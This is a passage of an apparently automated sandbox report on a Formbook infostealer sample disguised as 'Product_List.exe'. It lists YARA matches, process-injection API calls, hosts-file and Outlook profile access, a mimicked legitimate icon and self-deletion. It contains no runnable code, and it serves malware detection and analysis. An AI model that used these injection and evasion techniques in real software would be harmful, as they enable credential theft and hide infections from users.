          Source: 3.2.Product_List.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Product_List.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.Product_List.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 0_2_09F069E80_2_09F069E8
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 0_2_09F069D90_2_09F069D9
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 0_2_09F095480_2_09F09548
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 0_2_09F000400_2_09F00040
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 0_2_09F000110_2_09F00011
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004058033_2_00405803
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004038833_2_00403883
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0042310A3_2_0042310A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004229EB3_2_004229EB
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004221F13_2_004221F1
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_00401B603_2_00401B60
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004223DD3_2_004223DD
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004055DA3_2_004055DA
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004055E33_2_004055E3
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004225E63_2_004225E6
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004206433_2_00420643
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004226B73_2_004226B7
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_00422F713_2_00422F71
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0042170D3_2_0042170D
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0042073E3_2_0042073E
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004017C03_2_004017C0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0040BFAE3_2_0040BFAE
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0040BFB33_2_0040BFB3
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004017BF3_2_004017BF
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017841203_2_01784120
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176F9003_2_0176F900
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_018320A83_2_018320A8
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_018328EC3_2_018328EC
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_018210023_2_01821002
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017920A03_2_017920A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177B0903_2_0177B090
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0182DBD23_2_0182DBD2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01832B283_2_01832B28
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179EBB03_2_0179EBB0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_018322AE3_2_018322AE
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01760D203_2_01760D20
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_018325DD3_2_018325DD
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01832D073_2_01832D07
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177D5E03_2_0177D5E0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01831D553_2_01831D55
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017925813_2_01792581
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFAAFA24_2_0DFAAFA2
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFAAF9E4_2_0DFAAF9E
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFADF524_2_0DFADF52
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFACD424_2_0DFACD42
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFACD3E4_2_0DFACD3E
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFA82824_2_0DFA8282
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFA9C724_2_0DFA9C72
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFAC2624_2_0DFAC262
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFACE624_2_0DFACE62
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFACE5E4_2_0DFACE5E
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFA7C524_2_0DFA7C52
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFA7C434_2_0DFA7C43
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFAE8024_2_0DFAE802
          Source: C:\Windows\explorer.exeCode function: 4_2_0DFAD2024_2_0DFAD202
          Source: C:\Windows\explorer.exeCode function: 4_2_0E0712024_2_0E071202
          Source: C:\Windows\explorer.exeCode function: 4_2_0E0728024_2_0E072802
          Source: C:\Windows\explorer.exeCode function: 4_2_0E06BC434_2_0E06BC43
          Source: C:\Windows\explorer.exeCode function: 4_2_0E06BC524_2_0E06BC52
          Source: C:\Windows\explorer.exeCode function: 4_2_0E070E5E4_2_0E070E5E
          Source: C:\Windows\explorer.exeCode function: 4_2_0E0702624_2_0E070262
          Source: C:\Windows\explorer.exeCode function: 4_2_0E070E624_2_0E070E62
          Source: C:\Windows\explorer.exeCode function: 4_2_0E06DC724_2_0E06DC72
          Source: C:\Windows\explorer.exeCode function: 4_2_0E06C2824_2_0E06C282
          Source: C:\Windows\explorer.exeCode function: 4_2_0E070D3E4_2_0E070D3E
          Source: C:\Windows\explorer.exeCode function: 4_2_0E070D424_2_0E070D42
          Source: C:\Windows\explorer.exeCode function: 4_2_0E071F524_2_0E071F52
          Source: C:\Windows\explorer.exeCode function: 4_2_0E06EF9E4_2_0E06EF9E
          Source: C:\Windows\explorer.exeCode function: 4_2_0E06EFA24_2_0E06EFA2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041E563 NtCreateFile,3_2_0041E563
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041E613 NtReadFile,3_2_0041E613
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041E693 NtClose,3_2_0041E693
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041E743 NtAllocateVirtualMemory,3_2_0041E743
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041E65D NtReadFile,3_2_0041E65D
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041E68F NtClose,3_2_0041E68F
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_017A9910
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A99A0 NtCreateSection,LdrInitializeThunk,3_2_017A99A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_017A9860
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9840 NtDelayExecution,LdrInitializeThunk,3_2_017A9840
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_017A98F0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9A50 NtCreateFile,LdrInitializeThunk,3_2_017A9A50
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9A20 NtResumeThread,LdrInitializeThunk,3_2_017A9A20
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_017A9A00
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9540 NtReadFile,LdrInitializeThunk,3_2_017A9540
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A95D0 NtClose,LdrInitializeThunk,3_2_017A95D0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9710 NtQueryInformationToken,LdrInitializeThunk,3_2_017A9710
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9FE0 NtCreateMutant,LdrInitializeThunk,3_2_017A9FE0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_017A97A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9780 NtMapViewOfSection,LdrInitializeThunk,3_2_017A9780
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_017A9660
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_017A96E0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9950 NtQueueApcThread,3_2_017A9950
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A99D0 NtCreateProcessEx,3_2_017A99D0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017AB040 NtSuspendThread,3_2_017AB040
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9820 NtEnumerateKey,3_2_017A9820
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A98A0 NtWriteVirtualMemory,3_2_017A98A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9B00 NtSetValueKey,3_2_017A9B00
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017AA3B0 NtGetContextThread,3_2_017AA3B0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9A10 NtQuerySection,3_2_017A9A10
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9A80 NtOpenDirectoryObject,3_2_017A9A80
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9560 NtWriteFile,3_2_017A9560
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017AAD30 NtSetContextThread,3_2_017AAD30
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A9520 NtWaitForSingleObject,3_2_017A9520
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A95F0 NtQueryInformationFile,3_2_017A95F0
          Source: Product_List.exe, 00000000.00000002.592249907.0000000005410000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameW4ee.dll4 vs Product_List.exe
          Source: Product_List.exe, 00000000.00000000.543221004.000000000097C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenlWp.exe6 vs Product_List.exe
          Source: Product_List.exe, 00000000.00000002.581850388.0000000000FBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Product_List.exe
          Source: Product_List.exe, 00000000.00000002.594702520.00000000075C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRegive.dll4 vs Product_List.exe
          Source: Product_List.exe, 00000003.00000003.620046194.00000000012D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Product_List.exe
          Source: Product_List.exe, 00000003.00000003.582527719.00000000016C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Product_List.exe
          Source: Product_List.exe, 00000003.00000002.621298491.00000000016FD000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Product_List.exe
          Source: Product_List.exe, 00000003.00000002.621527245.000000000185F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Product_List.exe
          Source: Product_List.exe, 00000003.00000003.620046194.0000000001250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Product_List.exe
          Source: Product_List.exeBinary or memory string: OriginalFilenamenlWp.exe6 vs Product_List.exe
          Source: Product_List.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Product_List.exeReversingLabs: Detection: 29%
          Source: Product_List.exeVirustotal: Detection: 26%
          Source: Product_List.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Product_List.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Product_List.exe C:\Users\user\Desktop\Product_List.exe
          Source: C:\Users\user\Desktop\Product_List.exeProcess created: C:\Users\user\Desktop\Product_List.exe C:\Users\user\Desktop\Product_List.exe
          Source: C:\Users\user\Desktop\Product_List.exeProcess created: C:\Users\user\Desktop\Product_List.exe C:\Users\user\Desktop\Product_List.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Users\user\Desktop\Product_List.exeProcess created: C:\Users\user\Desktop\Product_List.exe C:\Users\user\Desktop\Product_List.exeJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess created: C:\Users\user\Desktop\Product_List.exe C:\Users\user\Desktop\Product_List.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Product_List.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\-15B7L5MNMJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@9/7
          Source: Product_List.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Product_List.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Product_List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Product_List.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Product_List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000004.00000000.608173495.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000004.00000000.608173495.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: nlWp.pdbSHA256 source: Product_List.exe
          Source: Binary string: nlWp.pdb source: Product_List.exe
          Source: Binary string: wntdll.pdbUGP source: Product_List.exe, 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Product_List.exe, 00000003.00000003.582527719.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.812467954.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.812467954.00000000030AF000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.620988497.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.623010577.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: Product_List.exe, 00000003.00000003.620046194.0000000001250000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000003.00000002.621298491.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.812197296.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Product_List.exe, Product_List.exe, 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Product_List.exe, 00000003.00000003.582527719.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.812467954.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.812467954.00000000030AF000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.620988497.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.623010577.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000004.00000000.608173495.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: cmd.pdb source: Product_List.exe, 00000003.00000003.620046194.0000000001250000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000003.00000002.621298491.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.812197296.0000000000D90000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Product_List.exe, MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.Product_List.exe.890000.0.unpack, MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 0_2_09F079E4 push E80D7E5Eh; retf 0_2_09F07A01
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 0_2_09F07A04 push E80C875Eh; ret 0_2_09F07A09
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041085A push ds; ret 3_2_0041085B
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041A8A6 push edi; retf 3_2_0041A8AC
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041B316 push edx; iretd 3_2_0041B320
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041BCF6 push ss; iretd 3_2_0041BCFE
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041B482 pushad ; retf 3_2_0041B48C
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0041AD04 push esi; iretd 3_2_0041AD0A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_00422DFE push ebp; retf 0000h3_2_00422E06
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_00401DB0 push eax; ret 3_2_00401DB2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_00405EEF push ds; ret 3_2_00405EFF
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_00410756 pushad ; retf 3_2_00410757
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_004117F6 push ss; ret 3_2_004117FE
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017BD0D1 push ecx; ret 3_2_017BD0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.384999519045175

          Hooking and other Techniques for Hiding and Protection

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (58).png
          Deletes itself after installation
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: c:\users\user\desktop\product_list.exeJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
